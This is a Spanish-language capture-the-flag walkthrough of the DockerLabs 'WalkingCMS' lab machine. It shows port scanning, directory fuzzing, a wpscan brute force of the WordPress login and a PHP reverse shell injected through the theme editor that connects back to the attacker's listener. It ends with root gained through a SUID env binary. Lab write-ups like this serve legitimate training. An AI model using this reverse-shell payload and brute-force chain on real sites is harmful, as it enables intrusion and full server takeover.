WalkingCMS DockerLabs (Easy)
Instalación
Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzip walkingcms.zipNos lo descomprimira y despues montamos la maquina de la siguiente forma.
bash auto_deploy.sh walkingcms.tarInfo:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarlaPor lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 12:35 EST
Nmap scan report for express.dl (172.17.0.2)
Host is up (0.000029s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.48 secondsSi vamos al puerto 80 no vemos nada interesante, por lo que vamos hacer fuzzing:
Gobuster
gobuster dir -u http://<IP>/ -w <WORDLIST> -x html,php,txt -t 100 -k -rInfo:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.html (Status: 403) [Size: 275]
/.htpasswd.php (Status: 403) [Size: 275]
/.htpasswd.html (Status: 403) [Size: 275]
/.htpasswd (Status: 403) [Size: 275]
/.htpasswd.txt (Status: 403) [Size: 275]
/.htaccess.txt (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/.htaccess.php (Status: 403) [Size: 275]
/index.html (Status: 200) [Size: 10701]
/server-status (Status: 403) [Size: 275]
/wordpress (Status: 200) [Size: 52441]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================Vemos que contiene un Wordpress, por lo que podremos hacer lo siguiente para comprobar el panel de admin llendo al login.
URL = http://<IP>/wordpress/wp-adminY efectivamente esto nos lleva a un panel de login, por lo que sacaremos el nombre de usuario de la sigueinte forma:
Escalate www-data
wpscan
wpscan --url http://<IP>/wordpress --enumerate uInfo:
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://172.17.0.2/wordpress/ [172.17.0.2]
[+] Started: Mon Jan 13 12:39:43 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.57 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://172.17.0.2/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://172.17.0.2/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://172.17.0.2/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://172.17.0.2/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
Fingerprinting the version - Time: 00:00:03 <============================================================================> (702 / 702) 100.00% Time: 00:00:03
[i] The WordPress version could not be detected.
[+] WordPress theme in use: twentytwentytwo
| Location: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/
| Last Updated: 2024-11-13T00:00:00.000Z
| Readme: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/readme.txt
| [!] The version is out of date, the latest version is 1.9
| Style URL: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/style.css?ver=1.6
| Style Name: Twenty Twenty-Two
| Style URI: https://wordpress.org/themes/twentytwentytwo/
| Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.6 (80% confidence)
| Found By: Style (Passive Detection)
| - http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/style.css?ver=1.6, Match: 'Version: 1.6'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] mario
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://172.17.0.2/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Jan 13 12:39:49 2025
[+] Requests Done: 1322
[+] Cached Requests: 12
[+] Data Sent: 377.335 KB
[+] Data Received: 29.704 MB
[+] Memory used: 239.426 MB
[+] Elapsed time: 00:00:05Vemos que sacamos el nombre de un usuario llamado mario, por lo que veremos a ver si sacamos la contraseña del mismo.
wpscan --url http://<IP>/wordpress --usernames mario --passwords <WORDLIST>Info:
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://172.17.0.2/wordpress/ [172.17.0.2]
[+] Started: Mon Jan 13 12:41:10 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.57 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://172.17.0.2/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://172.17.0.2/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://172.17.0.2/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://172.17.0.2/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
Fingerprinting the version - Time: 00:00:01 <============================================================================> (702 / 702) 100.00% Time: 00:00:01
[i] The WordPress version could not be detected.
[+] WordPress theme in use: twentytwentytwo
| Location: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/
| Last Updated: 2024-11-13T00:00:00.000Z
| Readme: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/readme.txt
| [!] The version is out of date, the latest version is 1.9
| Style URL: http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/style.css?ver=1.6
| Style Name: Twenty Twenty-Two
| Style URI: https://wordpress.org/themes/twentytwentytwo/
| Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.6 (80% confidence)
| Found By: Style (Passive Detection)
| - http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/style.css?ver=1.6, Match: 'Version: 1.6'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - mario / love
Trying mario / love Time: 00:00:02 < > (390 / 14344782) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: mario, Password: love
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Jan 13 12:41:20 2025
[+] Requests Done: 1234
[+] Cached Requests: 608
[+] Data Sent: 448.523 KB
[+] Data Received: 439.433 KB
[+] Memory used: 289.152 MB
[+] Elapsed time: 00:00:09Vemos que nos descubrio la contraseña, por lo que nos logearemos en el panel con las credenciales obtenidas.
User: mario
Pass: loveNos vamos a Apariencia -> Theme Code Editor y en la parte de index.php le meremos el siguiente codigo en alguna parte:
<?php
$sock=fsockopen("<IP>",<PORT>);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>Le daremos a Update File y esto cargara el codigo, entonces nos pondremos a la escucha de la siguiente forma:
nc -lvnp <PORT>Y nos metemos en el siguiente sitio web.
URL = http://<IP>/wordpress/wp-content/themes/twentytwentytwo/index.phpSi volvemos a donde teniamos la escucha, veremos lo siguiente:
listening on [any] 7777 ...
connect to [192.168.120.128] from (UNKNOWN) [172.17.0.2] 60426
whoami
www-dataSanitizacion de shell (TTY)
script /dev/null -c bash# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>Escalation Privileges
Si listamos los permisos SUID que tenemos, veremos lo siguiente:
find / -type f -perm -4000 -ls 2>/dev/nullInfo:
1966337 52 -rwsr-xr-x 1 root root 52880 Mar 23 2023 /usr/bin/chsh
1966461 48 -rwsr-xr-x 1 root root 48896 Mar 23 2023 /usr/bin/newgrp
1966472 68 -rwsr-xr-x 1 root root 68248 Mar 23 2023 /usr/bin/passwd
1966524 72 -rwsr-xr-x 1 root root 72000 Mar 23 2023 /usr/bin/su
1966398 88 -rwsr-xr-x 1 root root 88496 Mar 23 2023 /usr/bin/gpasswd
1966456 60 -rwsr-xr-x 1 root root 59704 Mar 23 2023 /usr/bin/mount
1966548 36 -rwsr-xr-x 1 root root 35128 Mar 23 2023 /usr/bin/umount
1966331 64 -rwsr-xr-x 1 root root 62672 Mar 23 2023 /usr/bin/chfn
1976895 48 -rwsr-xr-x 1 root root 48536 Sep 20 2022 /usr/bin/envVemos uno interesante que es el env:
1976895 48 -rwsr-xr-x 1 root root 48536 Sep 20 2022 /usr/bin/envPor lo que haremos lo siguiente:
env /bin/bash -pY con esto ya seremos root.
bash-5.2# whoami
rootPor lo que habremos terminado la maquina.
Last updated